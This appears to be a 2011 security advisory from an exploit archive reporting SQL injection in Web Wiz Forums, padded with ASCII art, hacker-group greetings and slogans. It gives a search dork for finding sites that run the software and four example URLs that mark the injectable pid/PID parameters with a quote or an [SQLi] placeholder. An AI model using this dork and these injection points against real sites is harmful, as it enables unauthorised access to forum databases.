Web Wiz Forums SQL Injection

2011.03.24
Credit: eXeSoul
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################## # Title : Web Wiz Forum Injection Vulnerability # # Author: eXeSoul # # Home : www.indishell.in or www.andhrahackers.com # # Email : exe.soul@live.com # # date : 23/3/2011 # # D0rk : [i] Powered by Web Wiz Forums # # # category : Web Apps [SQli] # ################################################################## ################################################################## # # _ _ _ # .-" "-. # / \ # | eXeSoul | # |, .-. .-. ,| # | )(_o/ \o_)( | # |/ /\ \| # (@_ (_ ^^ _) # _ ) \_______\__|IIIIII|__/_______________________________ # (_)@8@8{}<________|-\IIIIII/-|________________________________> # )_/ \ / # (@ # # +-+-+-+-+-+-+-+-+-+-+ # --+|I|N|D|I|S|H|E|L||L|+-- # +-+-+-+-+-+-+-+-+-+-+ # # ################################################################## ################################################################## # # Script Vendor: http://www.webwiz.co.uk/web-wiz-forums/ # ################################################################## ################################################################## ...----.... ..-:"'' . ''"-.. .-' '-. .' Indishell.in '. .' . . . . .''. .' . . .... . . ..: . . .' . . . . . . ...::. .. . . . . . .. . ....:IA. .: . . . . . . .. . .. .. ....:IA. .: . . .. . . .. . ... ....:.:VHA. '.. . .. . . . . .. . .. . .....:.::IHHB. .:. . . . . . . . . . . ...:.:... .......:HIHMM. .:.... . . ."::"'.. . . . .:.:.:II;,. .. ..:IHIMMA ':.:.. ..::IHHHHHI::. . . ...:.::::.,,,. . ....VIMMHM .:::I. .AHHHHHHHHHHAI::. .:...,:IIHHHHHHMMMHHL:. . VMMMM .:.:V.:IVHHHHHHHMHMHHH::..:" .:HIHHHHHHHHHHHHHMHHA. .VMMM. :..V.:IVHHHHHMMHHHHHHHB... . .:VPHHMHHHMMHHHHHHHHHAI.:VMMI ::V..:VIHHHHHHMMMHHHHHH. . .I":IIMHHMMHHHHHHHHHHHAPI:WMM ::". .:.HHHHHHHHMMHHHHHI. . .:..I:MHMMHHHHHHHHHMHV:':H:WM :: . :.::IIHHHHHHMMHHHHV .ABA.:.:IMHMHMMMHMHHHHV:'. .IHWW '. ..:..:.:IHHHHHMMHV" .AVMHMA.:.'VHMMMMHHHHHV:' . :IHWV :. .:...:".:.:TPP" .AVMMHMMA.:. "VMMHHHP.:... .. :IVAI .:. '... .:"' . ..HMMMHMMMA::. ."VHHI:::.... .:IHW' ... . . ..:IIPPIH: ..HMMMI.MMMV:I:. .:ILLH:.. ...:I:IM : . .'"' .:.V". .. . :HMMM:IMMMI::I. ..:HHIIPPHI::'.P:HM. :. . . .. ..:.. . :AMMM IMMMM..:...:IV":T::I::.".:IHIMA 'V:.. .. . .. . . . 'VMMV..VMMV :....:V:.:..:....::IHHHMH "IHH:.II:.. .:. . . . . " :HB"" . . ..PI:.::.:::..:IHHMMV" :IP""HHII:. . . . . .'V:. . . ..:IH:.:.::IHIHHMMMMM" :V:. VIMA:I.. . . . .. . . .:.I:I:..:IHHHHMMHHMMM :"VI:.VWMA::. .: . .. .:. ..:.I::.:IVHHHMMMHMMMMI :."VIIHHMMA:. . . .: .:.. . .:.II:I:AMMMMMMHMMMMMI :..VIHIHMMMI...::.,:.,:!"I:!"I!"I!"V:AI:VAMMMMMMHMMMMMM' ':.:HIHIMHHA:"!!"I.:AXXXVVXXXXXXXA:."HPHIMMMMHHMHMMMMMV V:H:I:MA:W'I :AXXXIXII:IIIISSSSSSXXA.I.VMMMHMHMMMMMM 'I::IVA ASSSSXSSSSBBSBMBSSSSSSBBMMMBS.VVMMHIMM'"' I:: VPAIMSSSSSSSSSBSSSMMBSSSBBMMMMXXI:MMHIMMI .I::. "H:XIIXBBMMMMMMMMMMMMMMMMMBXIXXMMPHIIMM' :::I. ':XSSXXIIIIXSSBMBSSXXXIIIXXSMMAMI:.IMM :::I:. .VSSSSSISISISSSBII:ISSSSBMMB:MI:..:MM ::.I:. ':"SSSSSSSISISSXIIXSSSSBMMB:AHI:..MMM. ::.I:. . ..:"BBSSSSSSSSSSSSBBBMMMB:AHHI::.HMMI :..::. . ..::":BBBBBSSBBBMMMB:MMMMHHII::IHHMI ':.I:... ....:IHHHHHMMMMMMMMMMMMMMMHHIIIIHMMV" "V:. ..:...:.IHHHMMMMMMMMMMMMMMMMHHHMHHMHP' ':. .:::.:.::III::IHHHHMMMMMHMHMMHHHHM" "::....::.:::..:..::IIIIIHHHHMMMHHMV" "::.::.. .. . ...:::IIHHMMMMHMV" "V::... . .I::IHHMMV"' '"VHVHHHAHHHHMMV:"' .o oOOOOOOOo OOOo Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO OOOOO '"OOOOOOOOOOOOOOOO"` oOO oOOOOOba. .adOOOOOOOOOOba .adOOOOo. oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': `$" `OOOO' `O"Y ' `OOOO' o . #################################################################### #################################################################### # # # # Go To Site :- # # # # *SQL injection Vulnerability* # # # # # [+]http://site.com/default.asp?pid=524' # [+]http://site.com/default.asp?pid=[SQLi] # [+]http://site.com/viewproduct.asp?PID=130' # [+]http://site.com/viewproduct.asp?PID=[SQli] # # # => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam # # => c0d3 for motherland, h4ck for motherland # # # # [#] DOne now time to rock \m/ # # # #################################################################### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX, G00g!3 W@rr!0r, Nazz ,r45c4l, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Bon3 , Badboy-Albinia, Mr.SK , I-H Guru,X__HMG, AK-47, [ICW] [Andhra Hackers], Ethical N00b, [Indishell crew] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #################################################################### # # Bug discovered : 23 March 2011 #################################################################### # # Jay Mahadev.!! Jay shree Ram.!! jay Shree krishna.!! Jay hind.!! # #################################################################### # # # 1337day.com [23-3-2011] ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top